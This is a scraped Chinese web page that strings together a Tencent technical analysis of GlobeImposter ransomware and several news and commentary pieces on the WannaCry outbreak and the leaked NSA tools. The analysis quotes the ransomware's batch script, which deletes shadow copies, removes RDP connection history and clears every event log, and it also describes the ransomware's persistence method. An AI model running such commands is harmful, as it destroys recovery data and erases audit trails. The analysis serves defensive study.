来源:蜘蛛抓取(WebSpider)
时间:2017-11-30 17:23
标签:
勒索病毒黑客抓到了吗
GlobeImposter勒索病毒技术分析报告 - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
GlobeImposter勒索病毒技术分析报告
共262001人围观
,发现 2 个不明物体
新年伊始,勒索病毒再度在国内传播肆虐,腾讯反病毒实验室近期接到多起客户遭受勒索软件攻击的反馈,通过跟进分析发现黑客使用的勒索病毒全部为GlobeImposter家族的勒索病毒,黑客在突破企业防护边界后释放并运行勒索病毒,最终导致系统破坏,影响正常工作秩序。
经腾讯反病毒实验室分析,此次GlobeImposter勒索家族攻击事件显现出下列特点:
1.&&&&&&GlobeImposter勒索家族习惯以垃圾邮件方式和扫描渗透的方式进行传播,此次勒索病毒的攻击过程极可能为Windows远程桌面服务密码被暴力破解后植入勒索病毒。
2.&&&&&&从勒索病毒样本层面看,此次的GlobeImposter勒索软件在代码上进行了一些改变。如以往该家族样本在加密之前会结束诸如”sql”,“outlook”,“excel”、”word”等进程,而此次的勒索病毒则没有这些对进程的检测的代码。
3.&&&&&&该次的勒索病毒使用了RSA+AES加密方式,其中AES密钥的生成方式并不是通过传统的随机函数等生成,而是通过CoCreateGuid函数生成全局唯一标识符,并将该标识符做为AES加密算法的secret key。
在网上公开的针对此家族勒索病毒的分析报告中,对文档加密部分的勒索原理都语焉不详,公开的报告中对文档加密算法等细节总是也是一笔代过。鉴于此,本篇将对该样本的勒索原理进行阐述,重点将从技术角度对文档的加密过程进行分析。
2.1 勒索病毒整体加密过程
勒索病毒使用了RSA+AES加密方式,加密过程中涉及两对RSA密钥(分别为黑客公私钥和用户公私钥,分别用hacker_rsa_xxx和user_rsa_xxx表示这两对密钥)和一对AES密钥。黑客RSA密钥用于加密用户RSA密钥,用户RSA密钥用于加密AES密钥,AES密钥用于加密文件内容。
具体的加密过程为:勒索病毒首先解码出一个内置的RSA公钥(hacker_rsa_pub),同时对每个受害用户,使用RSA生成公私钥(user_rsa_pub和user_rsa_pri),其中生成的密钥信息使用内置的RSA公钥(hacker_rsa_Public)进行加密后,做为用户ID。在遍历系统文件,对符合加密要求的文件进行加密。对每个文件,通过CoCreateGuid生成一个唯一标识符,并由该唯一标识符最终生成AES密钥(记为file_aes_key),对文件进行加密。在加密文件的过程中,该唯一标识符会通过RSA公钥
(user_rsa_pub) 加密后保存到文件中。&黑客在收到赎金、用户ID和文件后,通过自己的私钥(hacker_rsa_pri)解密用户ID,可以得到user_rsa_pri,使用user_rsa_pri解密文件,就可以得到文件的file_aes_key,进而可以通过AES算法解密出原始文件。&下面对样本中使用的一些技术手段进行分析。
2.2 加密字符解密算法
软件中的字符及内置的公钥等信息都以加密的方式保存,加密使用的为AES算法,函数为解密算法函数,函数包含5个参数,每个参数的含义如下:
参数1:返回值,解密后的内容
参数2:返回值,解密后的内容的长度
参数3:解密key
参数4:解密key的长度
参数5:文件句柄,如果文件句柄不为空,就将解密后的内容写入到该文件句柄对应的文件中
对aes_crypt函数,使用mbedtls_aes_crypt_ecb进行AES解密操作。
通过IDA的上下文交叉引用,看到共有七处调用了MyAESDecode函数进行解密内容,这七处调用功能解释如下:
2.3 解码排除文件夹与排除后缀名
恶意样本在勒索过程中对包含某些特殊字符的文件夹进行绕过,这些特殊的字符解码算法如下:
1.使用“CC 0B E4 F069 F6 AE 6F FF CC BF D9 2C E7 36 EE 21 79 2B 85 83 39 D6 32& F5 77 26 8C 2C DD 38 4A”作为AES key,利用2.2中的解密算法,解密处硬编码的0×210大小的数据内容,解密后的内容为硬编码的RSA公钥(hacker_rsa_pub)。
2.对上面解密出来的RSA公钥(hacker_rsa_pub)计算SHA256,计算sha256的代码片段如下:
3.使用sha256的值做为AES key,次利用2.2中的解密算法,解密出字符串列表。
解密出的字符串列表:
2.4 用户ID的生成
勒索病毒运行后,会在用户机器上生成名为”5A9DD5FDFF0DF883A75DE6A90CC5AEAFDE”的文件,此文件名为内置的公钥的SHA256哈希值。该文件中保存了用户ID信息。
用户ID的生成算法为:勒索病毒首先通过RSA-1024生成用户公私钥(user_rsa_pub和user_rsa_pri),将生成的密钥中的rsa.P与rsa.Q拼接上“.TRUE.HOWBACKFILE”等内容后,使用内置的公钥(hacker_rsa_pub)加密,结果作为用户ID,同时,生成的公钥(user_rsa_pub)会做为后面遍历文件系统时的加密key使用。可见,该用户ID也经过了RSA公钥(hacker_rsa_pub)的加密,在没有私钥(hacker_rsa_pri)的情况下,很难还原出RSA-1024的密钥内容。
2.5 文件加密过程
通过GetLogicalDrives得到盘符信息,对每个盘符开启一个线程进行加密,每个线程函数的参数包含三部分内容:当前盘符路径,加密key(user_rsa_pub),用户ID。
判断文件路径是不是属于排除路径:
函数sub_4094D9会实现对文件的加密,对文件的加密使用的是AES加密算法。下面将详细介绍该函数的过程AES加密的KEY通过CoCreateGuid生成,CoCreateGuid函数功能为生成全局唯一标识符,勒索病毒使用该全局唯一标识符做为secret_key, secret_key用来生成AES的加密key.。
AES加密时的IV参数由当前文件的大小和文件路径共同生成。IV参数将MD(filesize|| filename )后取前16位。
将IV和secret key使用MBEDTLS_MD_SHA256计算8192次HASH,并将HASH结果做为AES加密的KEY
随后,使用内置的RSA公钥将guid进行加密,并将加密过的guid及用户ID写入到当前文件中。
最后,使用AES算法将文件内容加密。
AES加密算法过程如下:
2.6 自启动
勒索病毒通过在RunOnce注册表下新建名为BrowserUpdateCheck的键值,达到开机自启动的目的。部分代码如下
2.7 自删除
通过调用CMD /c del来实现自删除,部分代码如下
2.8 删除远程桌面连接信息及事件日志
解密bat文件后释放到临时目录下,并加载运行
解密出来的bat文件内容如下
vssadmin.exe Delete Shadows /All /Quiet
reg delete"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"/va /f
reg delete"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"/f
reg add"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el')DO wevtutil.exe cl "%1"
Bat会删除远程桌面连接信息文件default.rdp,并通过wevtutil.execl命令删除日志信息
从上面的技术分析可以看出,对文件的加密使用的是AES加密,每个文件对应一个AES密钥,AES密钥由CoCreateGuid函数生成,该密钥经过用户公钥(user_rsa_pub)加密后保存在加密后的文件中。黑客使用CoCreateGuid函数生成key,一方面是考虑CoCreateGuid函数生成内容的唯一性与随机性,生成的全局唯一标识符做为key使用不易被猜解;另一方面可能是出于对反勒索安全软件的对抗。
最后,腾讯反病毒实验室提醒用户提高安全意识,不要随意打开来源不明的文件,或随意点击可疑的链接,对重要的数据文件定期进行非本地备份。对于可疑文件,可以使用电脑管家进行扫描,或者将文件上传哈勃分析系统()查看文件是否存在风险。
针对企业用户,尽量关闭不必要的文件共享权限以及445,135,139,3389等不必要的端口。针对文中提到的勒索攻击事件,可以使用御界防APT邮件网关()和御界高级威胁检测系统()两个安全产品进行有效的检测与防护。
*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM
悲剧,分析了半天然后其实没什么人会看.
必须您当前尚未登录。
必须(保密)
腾讯电脑管家官方账号
关注我们 分享每日精选文章
可以给我们打个分吗?勒索病毒发生变种 黑客:收100万比特币就公布工具 哪个黑客这么牛_国际新闻_海峡网
您现在的位置:&&&
勒索病毒发生变种,已感染病毒机器请立即断网。监测发现,在全球范围内爆发的WannaCry 勒索病毒出现了变种:WannaCry 2.0,与之前版本的不同是,这个变种取消了Kill Switch,不能通过注册某个域名来关闭变种勒索病毒的传播,该变种传播速度可能会更快。请广大网民尽快升级安装Windows操作系统相关补丁,已感染病毒机器请立即断网,避免进一步传播感染。
5月12日全球多个国家遭受一种勒索软件的攻击。受害者包括中国一些高校和英国多家医院。据了解,这种勒索软件是不法分子利用了美国国家安全局网络武器库中泄漏出的黑客工具。
复旦大学美国研究中心副研究员汪晓风在接受澎湃新闻采访时认为,这次袭击属于有组织网络犯罪的范畴,针对的是漏洞,而不是特定对象,随着微软、各网络安全公司和各国政府的重视,并及时提出技术应对措施,网络勒索得手难度会增大,扩张势头应该很快得到抑制。
据报道,电脑被这种勒索软件感染后,其中文件会被加密锁住,支付黑客所要求赎金后才能解密恢复。据悉,勒索金额最高达5个比特币,目前价值人民币5万多元。
汪晓风表示,此前也不乏有黑客通过网络攻击获利的事情发生,但此前的攻击大多指向中央银行或金融机构之类的大型机构。而这次黑客对单个袭击对象勒索的金额并不大,属于&走量&,通过扩大攻击的规模来保证获利的最大化。
新华社13日援引俄罗斯网络安全企业卡巴斯基实验室发布的一份报告说,这次网络攻击所用的黑客工具&永恒之蓝&,来源于美国国家安全局的网络武器库。
今年4月14日,一个名为&影子中间人&的黑客组织曾经进入美国国家安全局(NSA)网络,曝光了该局一批档案文件,同时公开了该局旗下的&方程式黑客组织&使用的部分网络武器。据报道,其中包括可以远程攻破全球约70% &视窗&系统(Windows)机器的漏洞利用工具。经紧急验证这些工具真实有效。
据了解,这些曝光的文件包含了多个Windows&神洞&的利用工具,不需要用户任何操作,只要联网就可以远程攻击,和多年前的冲击波、震荡波、Conficker等蠕虫一样可以瞬间血洗互联网。
据美国有线电视新闻网(CNN)4月15日报道,公开这些网络武器正是这个名为&影子中间人&(Shadow Brokers)的黑客组织。报道称,这批网络武器针对安装有微软公司windows系统的电脑和服务器的安全漏洞,可能会被用于攻击全球银行系统。
实际上早在去年,&影子中间人&就已经窃取了美国国家安全局的网络武器。日,黑客组织&影子中间人&通过社交平台称,已攻入美国国家安全局(NSA)的网络&武器库&&&&方程式组织&,并泄露了其中部分黑客工具和数据。
据CNN报道,该黑客组织曾经尝试在网络上出售这批网络武器,但是未能成功。据报道,该黑客组织曾经宣称如果他们收到100万个比特币(总价值约为5.68亿美元),就会公布所有工具和数据。
美国&截击&网站日证实,根据&棱镜门&事件曝光者、爱德华&斯诺登提供的最新文件,黑客组织此前称要在网上拍卖的强悍&网络武器&携带有美国国家安全局(NSA)的虚拟指纹,因此显然属于该局使用的黑客工具,其中不少可秘密攻击全球计算机。据报道,最重要的证据,来源于斯诺登最新提供的一份绝密文件&&美国国家安全局&恶意软件植入操作手册&。
汪晓峰表示,很多系统漏洞是由NSA先发现的,但并不告知公众,而是故意利用漏洞来开发网络武器和实施网络攻击。虽然从法律上NSA并没有义务向公众公开自己发现的漏洞,但这至少可以说明美国政府在类似问题上对公众利益不够重视。
据媒体报道,&方程式组织&开发机构实际上与美国国家安全局关系密切,是一个该局可能&不愿承认的&部门,这在黑客圈几乎是尽人皆知的秘密。&方程式组织&的开发机构已经活跃近20年,是全球技术&最牛&的黑客组织。
责任编辑:刘微
一周热点新闻
下载海湃客户端
关注海峡网微信
职业道德监督、违法和不良信息举报电话:4 举报邮箱:
本站游戏频道作品版权归作者所有,如果侵犯了您的版权,请联系我们,本站将在3个工作日内删除。
温馨提示:抵制不良游戏,拒绝盗版游戏,注意自我保护,谨防受骗上当,适度游戏益脑,沉迷游戏伤身,合理安排时间,享受健康生活。
CopyRight (C)2016 海峡网(福建日报主管主办) 版权所有 闽ICP备号-2
福建日报报业集团拥有海峡都市报(海峡网)采编人员所创作作品之版权,未经报业集团书面授权,不得转载、摘编或以其他方式使用和传播。
友情链接: |勒索病毒席卷全球,黑客只收到10万元,这些人却赚了一笔_凤凰资讯
勒索病毒席卷全球,黑客只收到10万元,这些人却赚了一笔
用微信扫描二维码分享至好友和朋友圈
5月15日,相信很多刚刚投入工作或学习的人们都收到通知,要求先拔掉网线再打开电脑。
据央视新闻消息,截至5月13日晚8点,我国共39730家机构被新型“蠕虫”式勒索病毒感染!感染该病毒后,不到十秒,电脑里所有文件全被加密无法打开,只有按弹窗提示交赎金才能解密。
受此消息影响,15日早盘,A股市场网络安全概念股集体高开,截至午间收盘(11:30)有多只股票涨停。
黑客只收到10万元“赎金”
一个名为“想哭”的勒索病毒12日袭击了全球上百个国家和地区使用微软视窗操作系统的电脑。该病毒和以往单纯盗号盗资料的病毒完全不同,黑客直接黑了你电脑,然后把电脑中的文件全加密,然后明目张胆的开口要钱:给钱就恢复文件,不给钱就删资料!
作为一个扩散到全世界的电脑病毒,不光有英文版,还有中文版,为了让你乖乖交钱,连”老天爷“都搬出来吓人了。
而且黑客还直接留下了付款方法和联系方式,可是让很多中国人尴尬的是……人家只收比特币。
小编了解到,从12日晚上开始,中国大学教育系统遭受了这种病毒的袭击,随后扩展到国内几乎所有地区,影响范围遍布高校、火车站、自助终端、邮政、加油站、医院、政府办事终端等多个领域,被感染的电脑数字还在不断增长中。
据央视新闻消息,该勒索病毒还可能导致在校大学生的论文被锁……
5月13日上午,记者独家报道,全国包括北京、上海、重庆、成都等多个城市的部分中国石油旗下加油站在当日凌晨突然出现断网,而因断网一时无法使用支付宝、微信、银联卡等联网支付方式,只能使用现金支付,不过,加油站加油业务可正常运行。
▲5月13日上午,成都一家加油站贴出充值业务暂定办理的通知。记者 朱万平 摄
中国石油方面称,截至5月14日12:00,中国石油80%以上加油站已经恢复网络连接,受病毒感染的加油站正在陆续恢复加油卡、银行卡、第三方支付功能。14日13:00左右,记者从北京中国石油华威路加油站了解到,该站已经恢复了第三方支付。
该勒索病毒在部分大学和企业肆掠的一个重要原因就是,它们往往用的都是老系统,且不注意更新补丁……微软公司就发布声明称,这款勒索病毒的文件名是Ransom:Win32.WannaCrypt。微软已于3月14日提供了系统安全升级补丁,目的就是用来防范这一款病毒袭击。现已运行微软免费杀毒软件和更新了安全包的用户都没有危险。
据路透社15日消息,微软批评美国政府囤积网络武器,以至被歹徒利用,认为各国政府应像对待实体武器一样,严格控制网络武器的保存与流向。此前有报道称,上周五开始的勒索软件攻击是不法分子利用了美国国家安全局网络武器库中泄漏出的黑客工具。
据新华社,欧盟刑警组织表示,值得庆幸的是只有极少数受害者向罪犯支付了赎金,所以背后的犯罪团伙并没有从中攫取太多利益。事实上从曝光的数据看,WannaCry病毒背后的黑客目前才收到8.2个比特币,价值约为14000美元(约合9.7万人民币),要知道,这可是祸害了100多个国家近20万PC的轰动性事件啊。
中国网络安全概念股涨疯了
搞出这么大事情的黑客没有赚多少钱,可中国的网络安全概念股却在15日上午涨疯了!
▲数据来源:东方财富网
天风证券此前发布的研报指出:
6月1日起《网络安全法》即将实施,针对信息安全、网络安全领域的立法一方面显示了国家保护公民网络空间的合法权益,维护网络空间安宁的迫切需求,另一方面也昭示了国家将积极打击网络安全层面的违法犯罪,在安全管理、内网安全审计以及网络安全基础建设层面加强管理的决心。
从IT投资的角度,此次勒索病毒爆发事件有望直接促进各层级加大对信息安全的重视,尤其是教育行业、政府部门、大型央企集团等重点行业,对于信息安全、网络安全及后期运维的投入有望持续加大。
西藏琳琅投资王琳此前对记者表示:
勒索病毒的网络安全事件警醒我们,信息安全、网络安全应当受到重视,同时也会促使相关部门加大对网络安全领域的投入。从整体而言,网络安全股将迎来投资机会。
同时,由于网络安全股以创业板居多,目前创业板整体上处于超卖状态,本身就存在技术性反弹的可能,这两股力量合力可能会刺激创业板的反弹,虽然力度不会很强,但赚钱效应还是较为明显的。
资深私募人士许绍新告诉记者:
此次比特币勒索病毒将带来网络安全概念的主题性投资机会,而大部分网络安全概念都是创业板公司居多,此次网络安全事件短期将会提升创业板反弹的机会。但这只是短期交易性机会,创业板要想扭转趋势还需要时间及基本面业绩配合。
(以上内容仅供参考,不构成任何投资建议)&
最后,小编借北京市委网信办、北京市公安局、北京市经信委联合发出《关于WannaCry勒索蠕虫出现变种及处置工作建议的通知》提醒大家:
一、请立即组织内网检测,查找所有开放445SMB服务端口的终端和服务器,一旦发现中毒机器,立即断网处置,目前看来对硬盘格式化可清除病毒。
二、目前微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快为电脑安装此补丁,网址为https://technet.microsoft.com/zh-cn/library/security/MS17-010;对于XP、2003等微软已不再提供安全更新的机器,建议升级操作系统版本,或关闭受到漏洞影响的端口,可以避免遭到勒索软件等病毒的侵害。
三、一旦发现中毒机器,立即断网。
四、启用并打开“Windows防火墙”,进入“高级设置”,在入站规则里禁用“文件和打印机共享”相关规则。关闭UDP135、445、137、138、139端口,关闭网络文件共享。
五、严格禁止使用U盘、移动硬盘等可执行摆渡攻击的设备。
六、尽快备份自己电脑中的重要文件资料到存储设备上。
七、及时更新操作系统和应用程序到最新的版本。
八、加强电子邮件安全,有效地阻拦掉钓鱼邮件,可以消除很多隐患。
九、安装正版操作系统、Office软件等。
大家都在看
(摘自微信公众号“每日经济新闻” ID:nbdnews,综合央视新闻、新华社、每经网)
用微信扫描二维码分享至好友和朋友圈
凤凰资讯官方微信
播放数:2026
播放数:1227
播放数:533
播放数:164428勒索病毒水很深:国家黑客+有组织犯罪!_魁北客-慢钱头条
勒索病毒水很深:国家黑客+有组织犯罪!
点击上方""可快捷关注我们
EternalBlue,永恒之蓝。一个美国国家安全局NSA开发的国家黑客工具,由于泄露而变身成国际黑客组织发布的WannaCry勒索病毒,肆虐全球。助纣为虐的还有NSA泄露的另一个国家黑客工具DoublePulsar。
上图中的每一个蓝点,都代表这24小时内感染上勒索病毒的一台计算机。根据malwaretech的统计,刚过去的一天全球有16.7万台计算机中招。
实际上这还是不完全统计,因为勒索病毒WannaCry已经有了升级版本,而malwaretech只能追踪老版本。另一个原因是malwaretech的服务器已经应接不暇,只能处理有限的数据。
据360威胁情报中心统计,从5月12日爆发之后,全球近百个国家的超过10万家组织和机构被攻陷,其中包括1600家美国组织,11200家俄罗斯组织,中国则有29000多个IP被感染。在西班牙,电信巨头Telefonica,电力公司Iberdrola,能源供应商Gas Natural在内的众多公司网络系统瘫痪;葡萄牙电信、美国运输巨头FedEx、瑞典某地方政府、俄罗斯第二大移动通信运营商Megafon都已曝出遭受攻击。而根据欧洲刑警组织的说法,本次攻击已经影响到150个国家和地区。随着病毒版本的更新迭代,具体数字可能还会增加。
Brad Smith, 微软的总裁兼官,昨天撰文抨击美国国家安全局私藏了发现的系统漏洞,才导致了全球的病毒攻击,而这背后是国家行为和有组织犯罪之间,完全无意却令人不安的联系。
为什么微软会怒怼美国政府,说他们私藏系统漏洞?这要从美国政府级流程VEP说起。
从90年代开始,美国政府就开始了计算机系统漏洞的研究以及使用。2008年开始,在小布什的首肯下,白宫制定了VEP (VulnerabilitiesEquities Process)流程。对于每个新发现或者购买来的系统漏洞信息(未被公众所知晓的系统漏洞),要进行各种评估,有一些会被公布,而另一些会被继续隐藏。其中被隐藏的部分,国家安全局或者中情局有可能开发国家黑客工具。这些工具被视为网络攻击武器的一部分。
斯诺登证实2009年,奥巴马政府曾下令使用网络攻击武器——代号“震网”的病毒,攻击了伊朗的核设施。其中原因复杂,简单说就是以色列设法通过马来西亚的软件公司,让伊朗购入了夹带着一病毒的离心机控制软件;2010年,病毒爆发,控制并破坏伊朗核设施的离心机如那件,最终造成1000余台离心机永久性物理损坏,不得不暂停浓缩铀的进程。
这也是史上首次通过虚拟空间对现实世界实施攻击破坏的案例,达到了以往只有通过实地军事行动才能实现的效果。而在去年,乌克兰的电网系统也曾遭到黑客攻击,导致数百户家庭供电中断。
2014年,专门用于加密程序库OpenSSL被发现有一个安全漏洞,称作Heartblead,也就是心脏流血。从这个名字就知道问题有多么严重。这个漏洞被称为互联网近年来最严重的安全危机。而根据彭博社的报道,美国国家安全局在漏洞被发现的两年前就已经知道了,而且一直在利用这个漏洞,至少可以接触到互联网上三分之二的加密服务器,包含谷歌、亚马逊、加拿大税局等等机构。
美国政府在一片批评中,承诺新发现的漏洞都予以公布。但是在这之前的呢?美国国家安全局NSA和中情局CIA手里又掌握着多少漏洞?拥有多少利用漏洞的网络武器?以国家之名,窃取了多少资料信息?
斯诺登证实,截止到2013年,美国中情局手中至少有上千种国家黑客工具。
2016年8月,一个叫&ShadowBrokers 的组织首次露面,他们入侵了美国国家安全局NSA的防火墙,窃取了大量的黑客工具。
Shadow Brokers 说:
我们作为一个黑客组织,入侵另一个黑客组织,窃取他们的黑客工具,是为了告诉你们,NSA&真的存在一个黑客组织对其他国进行非法黑客攻击。
这次肆虐全球的永恒之蓝,正是这一次窃取的工具之一。
微软说这次事件就如同战斧导弹失窃。
其实这背后的挑战是国家发现了系统漏洞,发现了成千上万的民众和企业被置于脆弱的环境,是应该公布漏洞让其强壮,还是利用漏洞让其更加脆弱?在互联网带来的全球一体化的今天,每次以国家之名而重金研发的国家黑客工具,是攻击了所谓敌人,强壮了某些部门?还是伤害了自己国家的民众?乃至全球很多机构和民众?
长按二维码,关注《魁北客》
创业不易,需您鼓励!
几个问答1银行不能做资管吗?可以。但相比其他机构没有任何优势。反而因为做债的文化享有很多劣势。银行要做资管,就必须把资管独立出来,比如设立独立的资管公司,脱离信贷文化。否则,他永远摆脱不了理财是影子信贷的命运,永远改变不了理财热衷非标债权的现状。2信托不该做资管吗?信托天生是做资管的。但我国的信托公司和理论上的信托不是一回事。我国的信托公司是影子银行,因此在具备银行的一切劣势的基础上,还不具备银行...&上周五,小编的电脑上突然弹框出现了“预防勒索病毒”的提示。要知道距离“熊猫烧香”已经过去很久了,突然出现的这个“勒索病毒”引起了小编的兴趣,然而在全球都在遭受“勒索病毒”肆虐的时候,这个国家却可以安然无恙!这个神奇的国家就是—朝鲜!这款名为“想哭”的病毒席卷全球,成千上万台电脑都被黑了。就连美国这样黑客云集,科技发达的国家都无可奈何。在IT之家报道的病毒分布实时图中,不难看出很多国家都没有幸免于难...&号外:我们开通原创功能和留言功能了,吐槽、建议统统抛过来吧。小编等你哦!5月12日晚间,一次黑客的行动,使全球近100个国家的微软系统计算机同时遭到名为WannaCry(想哭吗)或WannaDecryptor(想解锁吗)的电脑病毒袭击,至少4.5万台机器受到感染,造成数十亿网名的恐慌。在我国部分高校网络系统沦为重灾区,中石油加油站网络支付系统也受到影响。比特币?(附股)">勒索界面据了解,设计此次...&因分期的乱象很多,手机分期也在进化。分期1.0,0首付有利息分期购机,赚返点;分期2.0,0首付0利息,低返点;分期3.0,直接套现赚快钱;分期4.0,核裂变方式送手机拉客分期购机。几乎等于高利贷,手机分期购机就是超自已的收入水平提前消费。办理手机分期,一般分期公司会和你签合同,有些只口头说,书面合同都没有,看人下菜单,合同文字密密麻麻一下是看不出来的,里面的字又小又多,重要的项目不明显,业务员跟...&留言“加群”即可加入企业司库交流群!5月12日一款名为“想哭”(WannaCry)的勒索软件席卷全球,目前已使得英国、中国等150多个国家的20万台电脑中招。短短数日,从医院到高校再到企业,甚至政府机关也遭遇重创。以国内为例,今日早间西安交警秩序处秩序科发布消息称:接上级机关通知,从5月15日起,因网络故障,支队暂时停止办理交通违法处理业务,恢复业务办理时间将另行通知。紧接着珠海市住房公积金管理中...&
版权申明:本站内容全部来自于腾讯微信公众号,属第三方自助推荐平台。《创业板的重大利空被证监会辟谣!》的版权归原作者「买什么股」所有, 文章言论观点不代表慢钱头条的观点,
慢钱头条不承担任何法律责任。
公众号推荐
股权效应|懂“股票”从每天学习五分钟开始
欢迎访问www.fxzdy.com飞行总
聚焦资本圈行业动态,聚拢资本、人脉方法,
每个时代都有自己的时代性机会, 而我们这
海外置业购房投资一手情报站
金玉其质,妙药良研,您掌心里的临研学院
满城区百姓公共信息服务平台,情系百姓,心
一牛财经官方订阅号!
云工社是中国唯一的、专注于为农民工提供综
好的内容,值得赞赏
请使用微信支付
违规或不良信息
广告、钓鱼诈骗
内容不完整
手机号(选填)
如有疑问请致电 8
